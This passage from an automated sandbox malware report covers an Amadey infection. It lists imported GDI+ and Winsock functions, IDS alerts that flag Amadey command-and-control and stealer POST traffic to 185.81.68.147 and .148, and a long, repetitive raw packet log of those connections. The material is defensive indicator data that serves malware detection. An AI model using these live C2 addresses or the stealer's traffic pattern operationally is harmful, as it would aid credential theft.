                                                              gdiplus.dllGdiplusStartup, GdipSaveImageToFile, GdipGetImageEncodersSize, GdiplusShutdown, GdipGetImageEncoders, GdipCreateBitmapFromHBITMAP, GdipDisposeImage
                                                              WS2_32.dllclosesocket, inet_pton, getaddrinfo, WSAStartup, send, socket, connect, recv, htons, freeaddrinfo
                                                              Language of compilation systemCountry where language is spokenMap
                                                              EnglishUnited States
                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                              2024-12-13T07:47:05.831787+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.449736185.81.68.14780TCP
                                                              2024-12-13T07:47:05.846458+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449738185.81.68.14780TCP
                                                              2024-12-13T07:47:08.802544+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.449739185.81.68.14880TCP
                                                              2024-12-13T07:47:10.493418+01002855239ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST)1192.168.2.449741185.81.68.14780TCP
                                                              2024-12-13T07:47:10.515862+01002855239ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST)1192.168.2.449742185.81.68.14780TCP
                                                              2024-12-13T07:47:11.583266+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449743185.81.68.14780TCP
                                                              2024-12-13T07:47:11.952254+01002855239ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST)1192.168.2.449746185.81.68.14880TCP
                                                              2024-12-13T07:47:11.952254+01002856150ETPRO MALWARE Amadey CnC Activity M61192.168.2.449746185.81.68.14880TCP
                                                              2024-12-13T07:47:11.973837+01002855239ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST)1192.168.2.449747185.81.68.14880TCP
                                                              2024-12-13T07:47:11.973837+01002856150ETPRO MALWARE Amadey CnC Activity M61192.168.2.449747185.81.68.14880TCP
                                                              2024-12-13T07:47:14.878635+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.449750185.81.68.14880TCP
                                                              2024-12-13T07:47:15.970253+01002856151ETPRO MALWARE Amadey CnC Activity M71192.168.2.449752185.81.68.14880TCP
                                                              2024-12-13T07:47:16.063977+01002856151ETPRO MALWARE Amadey CnC Activity M71192.168.2.449753185.81.68.14880TCP
                                                              2024-12-13T07:47:21.332803+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.449757185.81.68.14880TCP
                                                              2024-12-13T07:47:27.441914+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.449762185.81.68.14880TCP
                                                              2024-12-13T07:47:33.552445+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.449766185.81.68.14880TCP
                                                              2024-12-13T07:47:39.660962+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.449770185.81.68.14880TCP
                                                              2024-12-13T07:47:45.832857+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.449774185.81.68.14880TCP
                                                              2024-12-13T07:47:51.971087+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.449782185.81.68.14880TCP
                                                              2024-12-13T07:47:58.126332+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.449786185.81.68.14880TCP
                                                              2024-12-13T07:48:04.221930+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.449792185.81.68.14880TCP
                                                              2024-12-13T07:48:10.290034+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.449811185.81.68.14880TCP
                                                              2024-12-13T07:48:16.362981+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.449830185.81.68.14880TCP
                                                              2024-12-13T07:48:22.439634+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.449846185.81.68.14880TCP
                                                              2024-12-13T07:48:28.519011+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.449863185.81.68.14880TCP
                                                              2024-12-13T07:48:34.644011+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.449882185.81.68.14880TCP
                                                              2024-12-13T07:48:40.970501+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.449900185.81.68.14880TCP
                                                              2024-12-13T07:48:47.051052+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.449920185.81.68.14880TCP
                                                              2024-12-13T07:48:53.239614+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.449938185.81.68.14880TCP
                                                              2024-12-13T07:48:59.678631+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.449953185.81.68.14880TCP
                                                              2024-12-13T07:49:05.786107+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.449970185.81.68.14880TCP
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Dec 13, 2024 07:47:04.366941929 CET4973680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:04.367295027 CET4973780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:04.395368099 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:04.488801956 CET8049736185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:04.488853931 CET8049737185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:04.488895893 CET4973680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:04.489064932 CET4973780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:04.489165068 CET4973780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:04.489203930 CET4973680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:04.517766953 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:04.517847061 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:04.517991066 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:04.608918905 CET8049737185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:04.610160112 CET8049736185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:04.637940884 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:05.823302984 CET8049737185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:05.824867964 CET4973780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:05.831722021 CET8049736185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:05.831787109 CET4973680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:05.846211910 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:05.846245050 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:05.846383095 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:05.846417904 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:05.846453905 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:05.846457958 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:05.846483946 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:05.846483946 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:05.846489906 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:05.846512079 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:05.846610069 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:05.846741915 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:05.846777916 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:05.846832037 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:05.846945047 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:05.846980095 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:05.846991062 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:05.847037077 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:05.966497898 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:05.966566086 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:05.966583967 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:05.966625929 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:05.970603943 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:05.970665932 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.037139893 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.037283897 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.037332058 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.037404060 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.041260004 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.041328907 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.041373968 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.041429996 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.049649954 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.049710989 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.049773932 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.049830914 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.058043957 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.058103085 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.058195114 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.058250904 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.066503048 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.066581011 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.066615105 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.066684961 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.074922085 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.075033903 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.075033903 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.075089931 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.083266020 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.083343029 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.083379030 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.083441019 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.091639996 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.091701984 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.091763020 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.091824055 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.100049973 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.100157976 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.100169897 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.100209951 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.108542919 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.108607054 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.108686924 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.108743906 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.116466045 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.116581917 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.116651058 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.229074955 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.229116917 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.229163885 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.229197979 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.231401920 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.231460094 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.231515884 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.231573105 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.236097097 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.236161947 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.236202002 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.236258030 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.240783930 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.240849972 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.240948915 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.241003990 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.245584011 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.245639086 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.245646954 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.245687962 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.250099897 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.250170946 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.250221968 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.250277042 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.254741907 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.254848003 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.254885912 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.254905939 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.259397984 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.259460926 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.259511948 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.259567022 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.264069080 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.264172077 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.264175892 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.264224052 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.268695116 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.268759012 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.268821001 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.268879890 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.273456097 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.273515940 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.273569107 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.273622036 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.277991056 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.278057098 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.278081894 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.278136015 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.282588959 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.282651901 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.282710075 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.282766104 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.287278891 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.287344933 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.287389994 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.287442923 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.291929007 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.291995049 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.292028904 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.292081118 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.296591997 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.296690941 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.296705961 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.296744108 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.301177979 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.301244974 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.301300049 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.301354885 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.305871964 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.305938005 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.305954933 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.306008101 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.310508013 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.310611963 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.310651064 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.310671091 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.315125942 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.315201044 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.315231085 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.315284014 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.319730997 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.319797993 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.421108007 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.421152115 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.421228886 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.421228886 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.422086954 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.422161102 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.422298908 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.422367096 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.426048040 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.426105022 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.426162958 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.426162958 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.429999113 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.430064917 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.430130959 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.430202961 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.433837891 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.433902979 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.433916092 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.433978081 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.437452078 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.437521935 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.437568903 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.437633038 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.441139936 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.441199064 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.441258907 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.441314936 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.444770098 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.444930077 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.444977999 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.445044041 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.448198080 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.448311090 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.448354959 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.448354959 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.451664925 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.451791048 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.451837063 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.451838017 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.455178022 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.455233097 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.455277920 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.455277920 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.458596945 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.458713055 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.458755016 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.458812952 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.462105989 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.462172985 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.462235928 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.462294102 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.465620041 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.465675116 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.467335939 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.467335939 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.469022989 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.469125032 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.469145060 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.469181061 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.472498894 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.472604990 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.475339890 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.475339890 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.475967884 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.476035118 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.476090908 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.476166964 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.479482889 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.479582071 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.479607105 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.479635000 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.482906103 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.483119011 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.483128071 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.483185053 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.486428022 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.486464024 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.487340927 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.487340927 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.489850998 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.489950895 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.489965916 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.490037918 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.493344069 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.493468046 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.493483067 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.493560076 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.496845961 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.496901989 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.496917009 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.496948957 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.500282049 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.500380993 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.500401020 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.500436068 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.503735065 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.503814936 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.503866911 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.505342007 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.507242918 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.507277966 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.507339954 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.507339954 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.510670900 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.510730028 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.511217117 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.511307955 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.514139891 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.514251947 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.514276981 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.514301062 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.517740965 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.517802954 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.517870903 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.517941952 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.521094084 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.521151066 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.521162033 CET4973880192.168.2.4185.81.68.147
